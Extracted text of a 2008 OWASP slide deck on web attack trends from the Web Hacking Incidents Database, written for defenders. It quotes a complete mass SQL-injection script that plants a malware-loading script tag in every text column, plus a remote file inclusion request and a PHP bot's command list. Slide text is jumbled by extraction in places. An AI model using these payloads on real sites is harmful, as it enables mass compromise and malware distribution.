Trends in Web Application Security What s hot in

Trends in Web Application Security: What’s hot in 2008 Ofer Shezaf, Breach Security OWASP App. Sec Europe May 2008 Based on the findings of the Web Hacking Incidents Database project Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation http: //www. owasp. org. il

About Myself http: //www. webappsec. org/projects/whid Ofer Shezaf, VP Product Management, Breach Security < Great title: 4 Enable me to host of the coolest cocktails in every conference. 4 And to sponsor Mod. Security, the open source WAF. < But don’t let the title confuse you: I am an application security guy. 4 Background in national information security. < Open Source and Community projects: 4 Officer, Web Application Security Consortium. 4 President, OWASP Israeli chapter. 4 Project Leader, Mod. Security Core Rule Set Project. 4 Project Leader, WASC Web Hacking Incident Database. < Based out of Tel-Aviv, Israel. OWASP

Breach Security http: //www. webappsec. org/projects/whid Technology Leaders < We make WAFs: 4 Mod. Security, Open Source 4 Web. Defend, Commercial < Headquarters in Carlsbad, CA, with R&D Center in Herzliya, Israel and London, UK. < Sole focus is web application security since 1999. < Best application security DNA in the industry. We wrote the books. 4 Great fun to have Ivan Ristic and Ryan Barnett on your team! OWASP

http: //www. webappsec. org/projects/whid The Challenge of Risk Analysis for Web Application Security OWASP

http: //www. webappsec. org/projects/whid The Web Application Security Risk < Applications are vulnerable: 4 Unique, each one exposing its own vulnerabilities. 4 Change frequently, requiring constant tuning of application security. 4 Complex and feature rich with the advent of AJAX, Web Services and Web 2. 0. Risk = Threat < Applications are threatened: Vulnerability 4 New business models drive “for profit” hacking. 4 Performed. Impact enabling by professionals complex attacks. < Potential impact may be severe: 4 Web applications are used for sensitive information and important transactions. 4 Attack may be targeted as clients. OWASP

http: //www. webappsec. org/projects/whid Threat is Difficult to Assess <Web Attacks are Stealth: 4 Victims hide breaches. 4 Incidents are not detected. <Statistics are Skewed: 4 Defacement (visible) and information leakage (regulated) are publicized more than other breaches. 4 Number of incident reported is statistically insignificant. <Most assessments are biased: 4 Believe neither vendors’ FUD nor developers’ self assurance. OWASP

Available Sources http: //www. webappsec. org/projects/whid Vulnerabilities <Databases: 4 Software : OSVDB, Bugtraq 4 Web sites: XSSed <Statistics: 4 WASC Statistics Project, 4 OWASP top 10 <Skewed towards vulnerabilities that are easy to find, but are not necessarily actively exploited or results in a significant outcome. 4 Good predictor of level of vulnerability. 4 Not adequate to predict threat or outcome. OWASP

Available Sources Attacks http: //www. webappsec. org/projects/whid < Zone-H: 4 The most comprehensive attack repository, very important for public awareness. 4 Reported by hackers and focus on defacements. 4 Lacks for profit attacks. 4 The “man bites a dog” syndrome. < WASC Distributed Open Proxy Honeypots Project 4 Monitor attack traffic disguised behind proxies. 4 Show promise but still limited in scope. < Data loss databases (attrition. org) 4 Includes any data loss incident: § Including lost notebook, electronic or paper versions. 4 Address a larger problem than Web Application Security or even IT security. OWASP

Available Sources The OWASP Top 10 2007 <Based on the CVE vulnerability database. <Minor expert adjustments (CSRF for example). <Is it related to real world attacks? http: //www. webappsec. org/projects/whid XSS is up, but probably overrated Attack A 1 A 2 A 3 A 4 A 5 A 6 XSS Include SQL Injection Flaws Combining many Malicious File Execution New attacks to A 2 Insecure Direct Object Reference New allowed so many CSRF new entries New Information Leakage and Improper Error Handling The new kid in town. Overhyped but may become a A 8 Insecure Cryptographic Storage commonly Insecure Communications A 9 New exploited A 10 Failure to Restrict URL Access New vulnerability in the future. A 7 Broken Authentication and Session Management OWASP

http: //www. webappsec. org/projects/whid The Web Hacking Incidents Database OWASP 10

http: //www. webappsec. org/projects/whid The Web Hacking Incident Database A Web Application Security Consortium (WASC) Project dedicated to recording web application security related incidents. OWASP

http: //www. webappsec. org/projects/whid Database Content < Incidents since 1999 < Each incident is classified: 4 Attack type 4 Outcome 4 Country of organization attacked 4 Industry segment of organization attacked 4 Country of origin of the attack 4 Vulnerable Software < Multiple values for a classification allowed. < Additional information: 4 A unique identifier: WHID year-id 4 Dates of occurrence and reporting 4 Description 4 Internet references < RSS feed OWASP

http: //www. webappsec. org/projects/whid Inclusion Criteria < The database includes only: 4 Publicly disclosed incidents. 4 Only web application related incidents: § Many times it is hard to know how the network was hacked. We try to read between the lines. § Federal Trade Commission (FTC) Reports are sometimes helpful, but are often published after years. 4 Incidents of interest: § We do not include most mass defacement incidents. § Defacements of “High Profile” sites are included. < Criteria: 4 Ensure the quality and correctness of the reported incidents. 4 Severely limit the number of incidents that gets in. 4 Are somewhat subjective. OWASP

http: //www. webappsec. org/projects/whid Web Application Security Trends OWASP

2007 Summary: http: //www. webappsec. org/projects/whid Attack Methods Statistics out of the Web Hacking Incidents Database annual report 2007. We can see that: < CSRF is hyped. < XSS is overrated. < Misconfiguration (A 10 in 2005) is a huge problem. < Encryption is not a real issue. A 3 2007 Incidents by attack method A 5 A 2 A 4 A 6 Old A 10 A 7 A 1 OWASP

2007 Summary: http: //www. webappsec. org/projects/whid Business Motivations For Hacking < Evenly divided between capitalists and ideologists. < Picture is skewed since externally visible incidents force disclosure. 2007 Incidents by attack outcome OWASP

2007 Summary: http: //www. webappsec. org/projects/whid Most Hacked Organizations I Think They Are Bluffing The next big thing PCI Like government plus a need for openness 2007 Incidents by sector of attacked organization Government is an ideological target, has weak IT, and a requirement to disclose OWASP

http: //www. webappsec. org/projects/whid 2008 Trends - Economy of scale < Finally large scale business models abusing web app vulnerabilities: 4 Attack targets Web site is used as an intermediator. 4 Site value for hackers is its loyal visitors and not information in or features of the site. 4 Many smaller sites are hacked. 4 It does not mean that the targeted attacks have stopped, but the visibility of the mass attacks is much higher. < Specific exploits: 4 SQL injection Crawlers: § Generic injection of i. Frame tags to web sites. § Attacks began in January and keep intensifying, hacking hundreds of thousands sites. 4 Web sites bots herding: § Uploading remotely controlled scripts to web sites. § We have seen in the field, but no public report yet. 4 Service providers: § Security of hosted sites falls through the cracks. OWASP 18

http: //www. webappsec. org/projects/whid SQL Injection Crawlers < Specific to MS-SQL tables DECLARE @T varchar(255), @C varchar(255) Select all structure but could be DECLARE Table_Cursor CURSOR FOR columns in adapted to other DBs. select a. name, b. name from sysobjects a, syscolumns b all tables Default MS-SQL security is < where a. id=b. id somewhat at blame. and a. xtype='u' < Script brutally modifies ALL and (b. xtype=99 or b. xtype=35 or b. xtype=231 or b. xtype=167) fields in the application: Iterate OPEN Table_Cursor FETCH NEXT 4 Assumes some will be over them FROM Table_Cursor INTO @T, @C displayed back to the user. WHILE(@@FETCH_STATUS=0) BEGIN exec(‘ update ['+@T+'] set ['+@C+']=rtrim(convert(varchar, ['+@C+'])) +''<script src=http: //www. qiqigm. com/m. js></script>''‘) FETCH NEXT FROM Table_Cursor INTO @T, @C END CLOSE Table_Cursor DEALLOCATE Table_Cursor 4 Hopes that the application would not be damaged beyond use. < Easy to detect and avoid in Append the 1 st place, yet so many script tag sites where hacked! pointing to 4 Simple signatures malware 4 Database security OWASP 19

http: //www. webappsec. org/projects/whid Web Site Bots Herding GET /XXXX. php? ADODB_DIR=http: //www. filmbox. ru/d. pl? HTTP/1. 1 TE: deflate, gzip; q=0. 3 Connection: TE, close Host: XXXXXX Not sure how Easily User-Agent: libwww-perl/5. 805 detectable switch(substr($mcmd[0], 1)) { case "restart": case "mail": //mail to from subject message case "dns": case "info": case "cmd": case "rndnick": case "php": case "exec": break; case "pscan": //. pscan 127. 0. 0. 1 6667 case "ud. server": //. udserver <server> <port> case "download": case "die": case "udpflood 1": case "tcpflood": case "massmail": what they tried to exploit. I did not see a successful attack. Control Methods Attack Methods OWASP 20

http: //www. webappsec. org/projects/whid Hacking Service Providers <Mass exploitation of known or zero day vulnerabilities: 4 Infrastructure software (c. Panel, Apache, PHP) 4 Packages installed in each account (Blogs, CMS). <Abuse of legitimate features: 4 Stolen credentials or accounts purchased using a stolen credit card. 4 File uploads, Web based shells, FTP. <Lack of sufficient separation between sites: 4 Privilege escalation on one site results in breaching all sites. <Used for spam, phishing, malware planting & installing bots. OWASP 21

http: //www. webappsec. org/projects/whid Ofer Shezaf, ofers@breach. com Further information at the WHID web site: http: //www. webappsec. org/projects/whid OWASP